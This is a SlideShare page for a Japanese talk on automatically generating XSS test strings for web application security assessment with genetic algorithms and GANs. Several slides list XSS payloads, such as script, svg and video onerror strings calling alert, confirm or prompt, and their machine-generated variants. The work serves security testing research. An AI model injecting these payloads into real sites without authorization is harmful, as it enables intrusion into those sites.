Submit Search
Upload
GAとGANによる検査値の自動生成
•
3 likes
•
3,890 views
Isao Takaesu
Follow
Machine Learning 15 minutes! #16
Read less
Read more
Software
Report
Share
Report
Share
1 of 36
Download now
Download to read offline
Recommended
脆弱性診断データの活用例 - Webアプリケーション診断編 -
脆弱性診断データの活用例 - Webアプリケーション診断編 -
Isao Takaesu
サイバーセキュリティ錬金術
サイバーセキュリティ錬金術
Isao Takaesu
RECOMMENDER for Web security engineers - 中級編 -
RECOMMENDER for Web security engineers - 中級編 -
Isao Takaesu
機械学習関連情報の収集方法
機械学習関連情報の収集方法
Isao Takaesu
機械学習を使ったハッキング手法
機械学習を使ったハッキング手法
Isao Takaesu
RECOMMENDER for Web security engineers - 初級編 -
RECOMMENDER for Web security engineers - 初級編 -
Isao Takaesu
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
Isao Takaesu
ハニーポッター技術交流会
ハニーポッター技術交流会
Isao Takaesu
Recommended
脆弱性診断データの活用例 - Webアプリケーション診断編 -
脆弱性診断データの活用例 - Webアプリケーション診断編 -
Isao Takaesu
サイバーセキュリティ錬金術
サイバーセキュリティ錬金術
Isao Takaesu
RECOMMENDER for Web security engineers - 中級編 -
RECOMMENDER for Web security engineers - 中級編 -
Isao Takaesu
機械学習関連情報の収集方法
機械学習関連情報の収集方法
Isao Takaesu
機械学習を使ったハッキング手法
機械学習を使ったハッキング手法
Isao Takaesu
RECOMMENDER for Web security engineers - 初級編 -
RECOMMENDER for Web security engineers - 初級編 -
Isao Takaesu
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
Isao Takaesu
ハニーポッター技術交流会
ハニーポッター技術交流会
Isao Takaesu
introduce "Stealing Machine Learning Models via Prediction APIs"
introduce "Stealing Machine Learning Models via Prediction APIs"
Isao Takaesu
SecurityCamp2015「バグハンティング入門」
SecurityCamp2015「バグハンティング入門」
Masato Kinugawa
Pythonと機械学習によるWebセキュリティの自動化
Pythonと機械学習によるWebセキュリティの自動化
Isao Takaesu
次世代プラットフォームのセキュリティモデル考察(前編)
次世代プラットフォームのセキュリティモデル考察(前編)
Yosuke HASEGAWA
OWASPの歩き方(How to walk_the_owasp)
OWASPの歩き方(How to walk_the_owasp)
Sen Ueno
[CB16] 機械学習でWebアプリケーションの脆弱性を見つける方法 by 高江須 勲
[CB16] 機械学習でWebアプリケーションの脆弱性を見つける方法 by 高江須 勲
CODE BLUE
他人事ではないWebセキュリティ
他人事ではないWebセキュリティ
Yosuke HASEGAWA
クラウドセキュリティ基礎 #seccamp
クラウドセキュリティ基礎 #seccamp
Masahiro NAKAYAMA
いまさら聞けないパスワードの取り扱い方
いまさら聞けないパスワードの取り扱い方
Hiroshi Tokumaru
これからのWebセキュリティ フロントエンド編 #seccamp
これからのWebセキュリティ フロントエンド編 #seccamp
Kyo Ago
Aiにwebアプリ診断をやらせてみる
Aiにwebアプリ診断をやらせてみる
Isao Takaesu
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
Yosuke HASEGAWA
安全なPHPアプリケーションの作り方2014
安全なPHPアプリケーションの作り方2014
Hiroshi Tokumaru
Railsエンジニアのためのウェブセキュリティ入門
Railsエンジニアのためのウェブセキュリティ入門
Hiroshi Tokumaru
新入社員のための大規模ゲーム開発入門 サーバサイド編
新入社員のための大規模ゲーム開発入門 サーバサイド編
infinite_loop
今夜わかるWebアプリケーション脆弱性診断 (OWASP Day 758 / 2018)
今夜わかるWebアプリケーション脆弱性診断 (OWASP Day 758 / 2018)
Sen Ueno
20131205 大阪 web制作者向け セキュリティセミナー~最近のWebサイト攻撃事例とキホン対策~
20131205 大阪 web制作者向け セキュリティセミナー~最近のWebサイト攻撃事例とキホン対策~
Minoru Sakai
Webアプリでパスワード保護はどこまでやればいいか
Webアプリでパスワード保護はどこまでやればいいか
Hiroshi Tokumaru
進化するWebトラッキングの話 #ssmjp
進化するWebトラッキングの話 #ssmjp
sonickun
MAX-JSオジサン#5
MAX-JSオジサン#5
minoru nakanou
Cybozu lt2017
Cybozu lt2017
Imaoka Micihihiro
【Connected.T3】SORACOMで実現するプライベートIoTバックエンド
【Connected.T3】SORACOMで実現するプライベートIoTバックエンド
SORACOM,INC
More Related Content
What's hot
introduce "Stealing Machine Learning Models via Prediction APIs"
introduce "Stealing Machine Learning Models via Prediction APIs"
Isao Takaesu
SecurityCamp2015「バグハンティング入門」
SecurityCamp2015「バグハンティング入門」
Masato Kinugawa
Pythonと機械学習によるWebセキュリティの自動化
Pythonと機械学習によるWebセキュリティの自動化
Isao Takaesu
次世代プラットフォームのセキュリティモデル考察(前編)
次世代プラットフォームのセキュリティモデル考察(前編)
Yosuke HASEGAWA
OWASPの歩き方(How to walk_the_owasp)
OWASPの歩き方(How to walk_the_owasp)
Sen Ueno
[CB16] 機械学習でWebアプリケーションの脆弱性を見つける方法 by 高江須 勲
[CB16] 機械学習でWebアプリケーションの脆弱性を見つける方法 by 高江須 勲
CODE BLUE
他人事ではないWebセキュリティ
他人事ではないWebセキュリティ
Yosuke HASEGAWA
クラウドセキュリティ基礎 #seccamp
クラウドセキュリティ基礎 #seccamp
Masahiro NAKAYAMA
いまさら聞けないパスワードの取り扱い方
いまさら聞けないパスワードの取り扱い方
Hiroshi Tokumaru
これからのWebセキュリティ フロントエンド編 #seccamp
これからのWebセキュリティ フロントエンド編 #seccamp
Kyo Ago
Aiにwebアプリ診断をやらせてみる
Aiにwebアプリ診断をやらせてみる
Isao Takaesu
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
Yosuke HASEGAWA
安全なPHPアプリケーションの作り方2014
安全なPHPアプリケーションの作り方2014
Hiroshi Tokumaru
Railsエンジニアのためのウェブセキュリティ入門
Railsエンジニアのためのウェブセキュリティ入門
Hiroshi Tokumaru
新入社員のための大規模ゲーム開発入門 サーバサイド編
新入社員のための大規模ゲーム開発入門 サーバサイド編
infinite_loop
今夜わかるWebアプリケーション脆弱性診断 (OWASP Day 758 / 2018)
今夜わかるWebアプリケーション脆弱性診断 (OWASP Day 758 / 2018)
Sen Ueno
20131205 大阪 web制作者向け セキュリティセミナー~最近のWebサイト攻撃事例とキホン対策~
20131205 大阪 web制作者向け セキュリティセミナー~最近のWebサイト攻撃事例とキホン対策~
Minoru Sakai
Webアプリでパスワード保護はどこまでやればいいか
Webアプリでパスワード保護はどこまでやればいいか
Hiroshi Tokumaru
進化するWebトラッキングの話 #ssmjp
進化するWebトラッキングの話 #ssmjp
sonickun
MAX-JSオジサン#5
MAX-JSオジサン#5
minoru nakanou
What's hot
(20)
introduce "Stealing Machine Learning Models via Prediction APIs"
introduce "Stealing Machine Learning Models via Prediction APIs"
SecurityCamp2015「バグハンティング入門」
SecurityCamp2015「バグハンティング入門」
Pythonと機械学習によるWebセキュリティの自動化
Pythonと機械学習によるWebセキュリティの自動化
次世代プラットフォームのセキュリティモデル考察(前編)
次世代プラットフォームのセキュリティモデル考察(前編)
OWASPの歩き方(How to walk_the_owasp)
OWASPの歩き方(How to walk_the_owasp)
[CB16] 機械学習でWebアプリケーションの脆弱性を見つける方法 by 高江須 勲
[CB16] 機械学習でWebアプリケーションの脆弱性を見つける方法 by 高江須 勲
他人事ではないWebセキュリティ
他人事ではないWebセキュリティ
クラウドセキュリティ基礎 #seccamp
クラウドセキュリティ基礎 #seccamp
いまさら聞けないパスワードの取り扱い方
いまさら聞けないパスワードの取り扱い方
これからのWebセキュリティ フロントエンド編 #seccamp
これからのWebセキュリティ フロントエンド編 #seccamp
Aiにwebアプリ診断をやらせてみる
Aiにwebアプリ診断をやらせてみる
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
安全なPHPアプリケーションの作り方2014
安全なPHPアプリケーションの作り方2014
Railsエンジニアのためのウェブセキュリティ入門
Railsエンジニアのためのウェブセキュリティ入門
新入社員のための大規模ゲーム開発入門 サーバサイド編
新入社員のための大規模ゲーム開発入門 サーバサイド編
今夜わかるWebアプリケーション脆弱性診断 (OWASP Day 758 / 2018)
今夜わかるWebアプリケーション脆弱性診断 (OWASP Day 758 / 2018)
20131205 大阪 web制作者向け セキュリティセミナー~最近のWebサイト攻撃事例とキホン対策~
20131205 大阪 web制作者向け セキュリティセミナー~最近のWebサイト攻撃事例とキホン対策~
Webアプリでパスワード保護はどこまでやればいいか
Webアプリでパスワード保護はどこまでやればいいか
進化するWebトラッキングの話 #ssmjp
進化するWebトラッキングの話 #ssmjp
MAX-JSオジサン#5
MAX-JSオジサン#5
Similar to GAとGANによる検査値の自動生成
Cybozu lt2017
Cybozu lt2017
Imaoka Micihihiro
【Connected.T3】SORACOMで実現するプライベートIoTバックエンド
【Connected.T3】SORACOMで実現するプライベートIoTバックエンド
SORACOM,INC
AI・IoT を活用したビジネスセミナー | AI に欠かせない IoT 技術の最新事例
AI・IoT を活用したビジネスセミナー | AI に欠かせない IoT 技術の最新事例
SORACOM,INC
クラウドセキュリティについて考える
クラウドセキュリティについて考える
Masaki Yamamoto
逆襲の Well-Architected Framework (Alternative Architecture DOJO #5) 20201118
逆襲の Well-Architected Framework (Alternative Architecture DOJO #5) 20201118
Masanori KAMAYAMA
CODE BLUE 2016 - 機械学習でWebアプリケーションの脆弱性を見つける方法
CODE BLUE 2016 - 機械学習でWebアプリケーションの脆弱性を見つける方法
Isao Takaesu
ノンコーディングでここまでできる!LINE BOT を作ってみよう!
ノンコーディングでここまでできる!LINE BOT を作ってみよう!
典子 松本
最強のセキュリティでIoTを実装する方法
最強のセキュリティでIoTを実装する方法
Shinji Saito
お手持ちのデータを最高速度で安全に転送してみよう
お手持ちのデータを最高速度で安全に転送してみよう
MurataNoriaki1
Developers Festa Sapporo 2017 / IoT時代を生き抜くエンジニアに必要な技術とは
Developers Festa Sapporo 2017 / IoT時代を生き抜くエンジニアに必要な技術とは
SORACOM,INC
Security camp cpu
Security camp cpu
Imaoka Micihihiro
Azure のApp Center でアプリの 使用状況を分析する
Azure のApp Center でアプリの 使用状況を分析する
Yusuke Kojima
情シス必要論 re:Birth
情シス必要論 re:Birth
Mitsuhiro Yamashita
Azure の App Center でアプリの 使用状況を分析する
Azure の App Center でアプリの 使用状況を分析する
Yusuke Kojima
業務時間で書いたパッチは誰のもの?OSS活動にまつわる罠 (builderscon tokyo 2018)
業務時間で書いたパッチは誰のもの?OSS活動にまつわる罠 (builderscon tokyo 2018)
uchan_nos
Microsoft Flow 改め、Power Automateはじめました。
Microsoft Flow 改め、Power Automateはじめました。
典子 松本
Attempt of implementation of neural network model on FPGA
Attempt of implementation of neural network model on FPGA
Imaoka Micihihiro
iOS コンソーシアム関西支部 | IoTの課題とSORACOMが提供する解決策
iOS コンソーシアム関西支部 | IoTの課題とSORACOMが提供する解決策
SORACOM,INC
2014年を振り返る 今年の技術トレンドとDockerについて
2014年を振り返る 今年の技術トレンドとDockerについて
Masahito Zembutsu
Lチカからはじめるfpga入門
Lチカからはじめるfpga入門
Imaoka Micihihiro
Similar to GAとGANによる検査値の自動生成
(20)
Cybozu lt2017
Cybozu lt2017
【Connected.T3】SORACOMで実現するプライベートIoTバックエンド
【Connected.T3】SORACOMで実現するプライベートIoTバックエンド
AI・IoT を活用したビジネスセミナー | AI に欠かせない IoT 技術の最新事例
AI・IoT を活用したビジネスセミナー | AI に欠かせない IoT 技術の最新事例
クラウドセキュリティについて考える
クラウドセキュリティについて考える
逆襲の Well-Architected Framework (Alternative Architecture DOJO #5) 20201118
逆襲の Well-Architected Framework (Alternative Architecture DOJO #5) 20201118
CODE BLUE 2016 - 機械学習でWebアプリケーションの脆弱性を見つける方法
CODE BLUE 2016 - 機械学習でWebアプリケーションの脆弱性を見つける方法
ノンコーディングでここまでできる!LINE BOT を作ってみよう!
ノンコーディングでここまでできる!LINE BOT を作ってみよう!
最強のセキュリティでIoTを実装する方法
最強のセキュリティでIoTを実装する方法
お手持ちのデータを最高速度で安全に転送してみよう
お手持ちのデータを最高速度で安全に転送してみよう
Developers Festa Sapporo 2017 / IoT時代を生き抜くエンジニアに必要な技術とは
Developers Festa Sapporo 2017 / IoT時代を生き抜くエンジニアに必要な技術とは
Security camp cpu
Security camp cpu
Azure のApp Center でアプリの 使用状況を分析する
Azure のApp Center でアプリの 使用状況を分析する
情シス必要論 re:Birth
情シス必要論 re:Birth
Azure の App Center でアプリの 使用状況を分析する
Azure の App Center でアプリの 使用状況を分析する
業務時間で書いたパッチは誰のもの?OSS活動にまつわる罠 (builderscon tokyo 2018)
業務時間で書いたパッチは誰のもの?OSS活動にまつわる罠 (builderscon tokyo 2018)
Microsoft Flow 改め、Power Automateはじめました。
Microsoft Flow 改め、Power Automateはじめました。
Attempt of implementation of neural network model on FPGA
Attempt of implementation of neural network model on FPGA
iOS コンソーシアム関西支部 | IoTの課題とSORACOMが提供する解決策
iOS コンソーシアム関西支部 | IoTの課題とSORACOMが提供する解決策
2014年を振り返る 今年の技術トレンドとDockerについて
2014年を振り返る 今年の技術トレンドとDockerについて
Lチカからはじめるfpga入門
Lチカからはじめるfpga入門
More from Isao Takaesu
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 Arsenal
Isao Takaesu
OSSで作る機械学習を用いたペネトレーションテストツール
OSSで作る機械学習を用いたペネトレーションテストツール
Isao Takaesu
サイバーセキュリティ錬金術 - ノイズから価値あるデータを生成する技術 -
サイバーセキュリティ錬金術 - ノイズから価値あるデータを生成する技術 -
Isao Takaesu
Convolutional Neural Networkに対する攻撃手法
Convolutional Neural Networkに対する攻撃手法
Isao Takaesu
Discussion AIの脆弱性について
Discussion AIの脆弱性について
Isao Takaesu
ITエンジニアのための機械学習理論入門 第5章
ITエンジニアのための機械学習理論入門 第5章
Isao Takaesu
CODE BLUE 2016 - Method of Detecting Vulnerability in Web Apps
CODE BLUE 2016 - Method of Detecting Vulnerability in Web Apps
Isao Takaesu
AISECjp SAIVS(Spider Artificial Intelligence Vulnerability Scanner)
AISECjp SAIVS(Spider Artificial Intelligence Vulnerability Scanner)
Isao Takaesu
More from Isao Takaesu
(8)
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 Arsenal
OSSで作る機械学習を用いたペネトレーションテストツール
OSSで作る機械学習を用いたペネトレーションテストツール
サイバーセキュリティ錬金術 - ノイズから価値あるデータを生成する技術 -
サイバーセキュリティ錬金術 - ノイズから価値あるデータを生成する技術 -
Convolutional Neural Networkに対する攻撃手法
Convolutional Neural Networkに対する攻撃手法
Discussion AIの脆弱性について
Discussion AIの脆弱性について
ITエンジニアのための機械学習理論入門 第5章
ITエンジニアのための機械学習理論入門 第5章
CODE BLUE 2016 - Method of Detecting Vulnerability in Web Apps
CODE BLUE 2016 - Method of Detecting Vulnerability in Web Apps
AISECjp SAIVS(Spider Artificial Intelligence Vulnerability Scanner)
AISECjp SAIVS(Spider Artificial Intelligence Vulnerability Scanner)
GAとGANによる検査値の自動生成
1.
2017.09.30 Machine Learning 15minutes!
#16 Presented by Isao Takaesu 機械学習とサイバーセキュリティ - GAとGANによる検査値の自動生成 -
2.
About the speaker •
職業 : セキュリティエンジニア • 所属 : 三井物産セキュアディレクション • 趣味 : 脆弱性スキャナ作り、機械学習 • ブログ: http://www.mbsd.jp/blog/ • Black Hat Asia Arsenal, CODE BLUE / 2016 • 情報セキュリティEXPO, PYCON JP / 2017 • 勉強会「AISECjp」を主催 高江洲 勲 Takaesu Isao ML15minutes! Twitter: @bbr_bbq MBSD
3.
ML15minutes!MBSD 検証成果 http://www.mbsd.jp/insight.html ・White paper ・Blog https://www.mbsd.jp/blog/takaesu_index.html
4.
ML15minutes!MBSD Webアプリケーション診断に必要な、 脆弱性の検査値を自動生成する。 本日のお話し
5.
Webアプリケーション診断とは… Webアプリの脆弱性を検出 Webアプリケーション診断とは? MBSD ML15minutes!
6.
Webアプリケーション診断 MBSD 診断員 Web Server Web Apps Fire
wall 診断ベンダ 顧客 1. 疑似攻撃 SQLi? XSS? 2. 反応の分析 1. 様々な検査値を使用してWebアプリを疑似攻撃 2. Webアプリの反応を分析して脆弱性有無を判定 ML15minutes! 多くの脆弱性を検出するには、検査値の充実が必須。
7.
検査値って何? <script>alert();</script> <img[Sp]src=x[Sp]onerror=alert();> </textarea><script>alert();</script> "><script>alert();</script> '--><script>prompt();</script> "><frame[Sp]src="javascript:prompt()"> ';[Sp]alert();// [CrLf][Sp]MsgBox[Sp]Document.Domain javascript:alert``; ・・・ Webアプリに潜む脆弱性を検出する文字列。 パターンが豊富であり、作成にはノウハウが必要。 MBSD ML15minutes! 例)Cross-Site Scripting(XSS)の検査値
8.
ML15minutes!MBSD どうやって自動生成する?
9.
ML15minutes! 検査値の自動生成手法 MBSD ・遺伝的アルゴリズム (Genetic Algorithm:GA) ・Generative
Adversarial Networks (GAN)
10.
ML15minutes! 生成手順 MBSD 1.GAで検査値を幾つか生成(5~6パターンくらい) 2.GANで(1の検査値を基に)大量の検査値を生成
11.
ML15minutes! 生成手順 MBSD 1.GAで検査値を幾つか生成(5~6パターンくらい) 2.GANで(1の検査値を基に)大量の検査値を生成
12.
ML15minutes! 遺伝的アルゴリズム(Genetic Algorithm:GA) MBSD 進化計算を繰り返し、最適な遺伝子の組み合わせの個体を探索。 Initialization Fitness/Evaluation CrossoverMutation Individual ●
▲ ■ × ★Gene Selection Generation alternation
13.
ML15minutes! GAによる検査値の生成方法 MBSD ・XSSの検査値の一例 “><script>alert();</script> <object data=xss.html> <svg/onload=al¥u0065rt();> <video><source onerror=confirm(1);> <iframe
onload=alert();> ・・・ 検査値はHTMLやJavaScriptの要素の組み合わせで構成。
14.
ML15minutes! GAによる検査値の生成方法 MBSD ・XSSの検査値の一例 [“], [>], [<script>],
[alert();], [</script>] [<object], [data=], [xss.html], [>] [<svg], [/], [onload=], [al¥u0065rt();], [>] [<video>], [<source], [onerror=], [confirm(1);], [>] [<iframe], [onload=], [alert();], [>] 各検査値の最小要素を遺伝子として定義。 遺伝子の最適な組み合わせを持った個体を探索。
15.
ML15minutes! GAによる検査値の生成方法 MBSD MDN docs等から最小要素を収集し、約220種類の遺伝子を定義。 ・遺伝子リスト
16.
ML15minutes! GAによる検査値の生成方法 MBSD ・生成手順の詳細 日本語:https://www.mbsd.jp/blog/20170821.html English:https://www.mbsd.jp/blog/20170921.html
17.
ML15minutes! GAによる検査値の生成方法 MBSD 進化計算を繰り返すことで、約6種類の検査値を生成。 ※計算時間は各5時間程度 No 検査値 1 <script>al¥u0065rt``;</script> 2
<iframe/onload=alert();><select/cols= 3 <svg/onload=alert();></iframe><q 4 <video><source onerror=confirm(1);> 5 <body onload=alert();><form </thead> 6 <video><source onerror=alert();src=x <video> ・GAで生成した検査値例
18.
ML15minutes! GAによる検査値の生成方法 MBSD 進化計算を繰り返すことで、約6種類の検査値を生成。 ※計算時間は各5時間程度 ⇒ あまり効率的ではない・・・ No
検査値 1 <script>al¥u0065rt``;</script> 2 <iframe/onload=alert();><select/cols= 3 <svg/onload=alert();></iframe><q 4 <video><source onerror=confirm(1);> 5 <body onload=alert();><form </thead> 6 <video><source onerror=alert();src=x <video> ・GAで生成した検査値例
19.
ML15minutes! 生成手順 MBSD 1.GAで検査値を幾つか(5~6パターンくらい)生成 2.GANで(1の検査値を基に)大量の検査値を生成
20.
ML15minutes! Generative Adversarial Networks:GAN MBSD 訓練データを模倣したfakeデータを大量に生成。 ・ ・ ・ Noise
(Z) Generator (G) ・ ・ ・ Generative Data : G(z) ・ ・ ・ ・ ・ ・ Train Data Train Data ・・・ Discriminator (D) Probability True? X Dを騙す G(z)を見破る
21.
ML15minutes! GANの利用例 MBSD 学習を重ねることで、徐々に訓練データに近似したデータを生成。 ・訓練データ ・GANで生成したデータ
22.
ML15minutes! GANによる検査値の生成方法 MBSD ・ ・ ・ Noise (Z) Generator (G) ・ ・ ・ Generative Data
: G(z) ・ ・ ・ ・ ・ ・ Train Data Train Data ・・・ Discriminator (D) Genetic Algorithm Probability True? GAN ”GAの検査値“を訓練データにし、様々な検査値を生成。
23.
ML15minutes! GANで生成した検査値(1/6) MBSD 1つの訓練データから、複数種類の検査値が生成される。 ※処理時間は30分程度。 検査値 訓練データ:<script>alert();</script></table><hr/ --------------------------------------------------- 生成データ: <script>alert``;</script><table/</td> <script>al¥u0065rt();</script></tr><th/ <script>prompt(1);</script><th/<col/ <script>confirm(1);</script><thead <table/ ・・・ ・GANの学習過程で生成された検査値
24.
ML15minutes! GANで生成した検査値(2/6) MBSD 1つの訓練データから、複数種類の検査値が生成される。 ※処理時間は30分程度。 検査値 訓練データ:<iframe/onload=alert();><select/ --------------------------------------------------- 生成データ: colspan=<iframe <a onload=al¥u0065rt();> <object/onload="onfocus=alert();"<script
type="text/javascript"> <iframe onload=alert``; /><select icon=<iframe/<img onload=al¥u0065rt();> ・・・ ・GANの学習過程で生成された検査値
25.
ML15minutes! GANで生成した検査値(2/6) MBSD 訓練データに含まれないHTMLタグを使った検査値も生成。 検査値 訓練データ:<iframe/onload=alert();><select/ --------------------------------------------------- 生成データ: colspan=<iframe <a onload=al¥u0065rt();> <object/onload="onfocus=alert();"<script
type="text/javascript"> <iframe onload=alert``; /><select icon=<iframe/<img onload=al¥u0065rt();> ・・・ ・GANの学習過程で生成された検査値
26.
ML15minutes! GANで生成した検査値(3/6) MBSD 1つの訓練データから、複数種類の検査値が生成される。 ※処理時間は30分程度。 検査値 訓練データ:<svg/<canvas/<select/onload=confirm(1);> --------------------------------------------------- 生成データ: <svg/onload="¥u0061lert();"></output> <object/src=x onload=alert();¥n<script type="text/javascript"> <script/src="data:text/html,alert();"<script></script> <svg/onload=confirm(1);> ・・・ ・GANの学習過程で生成された検査値
27.
ML15minutes! GANで生成した検査値(3/6) MBSD 検査値 訓練データ:<svg/<canvas/<select/onload=confirm(1);> --------------------------------------------------- 生成データ: <svg/onload="¥u0061lert();"></output> <object/src=x onload=alert();¥n<script type="text/javascript"> <script/src="data:text/html,alert();"<script></script> <svg/onload=confirm(1);> ・・・ ・GANの学習過程で生成された検査値 訓練データに含まれないHTMLタグを使った検査値も生成。
28.
ML15minutes! GANで生成した検査値(4/6) MBSD 1つの訓練データから、複数種類の検査値が生成される。 ※処理時間は30分程度。 検査値 訓練データ:<video><source onerror=confirm(1);> --------------------------------------------------- 生成データ: <video><source onerror="¥u0061lert``;"> <video><source
onerror="al¥u0065rt``;"> <video><source/onerror=alert();> <video><source onerror=prompt(1);> ・・・ ・GANの学習過程で生成された検査値
29.
ML15minutes! GANで生成した検査値(5/6) MBSD 1つの訓練データから、複数種類の検査値が生成される。 ※処理時間は30分程度。 検査値 訓練データ:icon=<iframe/<body onload=¥u0061lert();> --------------------------------------------------- 生成データ: headers=<body/<body onload=alert();> icon=<body
<input/onload=confirm(1);> kind=<body <img onload=alert``;> <img src=x <keygen onerror=¥u0061lert``;> ・・・ ・GANの学習過程で生成された検査値
30.
ML15minutes! GANで生成した検査値(5/6) MBSD 検査値 訓練データ:icon=<iframe/<body onload=¥u0061lert();> --------------------------------------------------- 生成データ: headers=<body/<body onload=alert();> icon=<body
<input/onload=confirm(1);> kind=<body <img onload=alert``;> <img src=x <keygen onerror=¥u0061lert``;> ・・・ ・GANの学習過程で生成された検査値 訓練データに含まれないHTMLタグを使った検査値も生成。
31.
ML15minutes! GANで生成した検査値(6/6) MBSD 1つの訓練データから、複数種類の検査値が生成される。 ※処理時間は30分程度。 検査値 訓練データ: <embed onload=alert();<script type="text/javascript"> --------------------------------------------------- 生成データ: <embed/onload=al¥u0065rt();¥n<script
type="text/javascript"> <embed onload=alert``;¥n<script type="text/javascript"> <embed/onload=prompt(1);¥n<script type="text/javascript"> <embed/src=x onload=confirm(1);¥n<script type="text/javascript"> ・・・ ・GANの学習過程で生成された検査値
32.
ML15minutes!MBSD さらに検査値を増やす。
33.
ML15minutes! GANで追加生成した検査値 MBSD 訓練データに含まれないHTMLタグを使った検査値が生成される。 さらに、生成データを訓練データとする。以降、繰り返す・・・ 検査値 訓練データ: <object/src=x onload=alert();¥n<script type="text/javascript"> <script/src="data:text/html,alert();"<script></script> <img
src=x <keygen onerror=¥u0061lert``;> --------------------------------------------------- 生成データ: <svg/onload=al¥u0065rt();¥n<script type="text/javascript"> <iframe/*/onload=charset=alert();> <iframe src=x <keygen onload=alert();¥n<script></script> <script/src="data:text/html,alert``;"
<script></script> ・・・ 1回目に生成された新しいパターンの検査値を訓練データとする。
34.
ML15minutes! GANで追加生成した検査値 MBSD 検査値の偏りを防ぐ効果。 HTML・JS・記号の全組み合わせ検査値を生成できる可能性。 検査値 訓練データ: <object/src=x onload=alert();¥n<script type="text/javascript"> <script/src="data:text/html,alert();"<script></script> <img
src=x <keygen onerror=¥u0061lert``;> --------------------------------------------------- 生成データ: <svg/onload=al¥u0065rt();¥n<script type="text/javascript"> <iframe/*/onload=charset=alert();> <iframe src=x <keygen onload=alert();¥n<script></script> <script/src="data:text/html,alert``;"
<script></script> ・・・ 1回目に生成された新しいパターンの検査値を訓練データとする。
35.
ML15minutes!MBSD ・検査値の生成に業務ノウハウは不要 ・効率よく大量の検査値を生成可能 ・その他データの生成にも応用可能(要検証) *GAによる組み合わせ最適 ⇒ GANで増やす Summary [検証用コード] https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/Generator
36.
Download “.PDF” version
of this document: ≫ https://www.slideshare.net/babaroa
Download now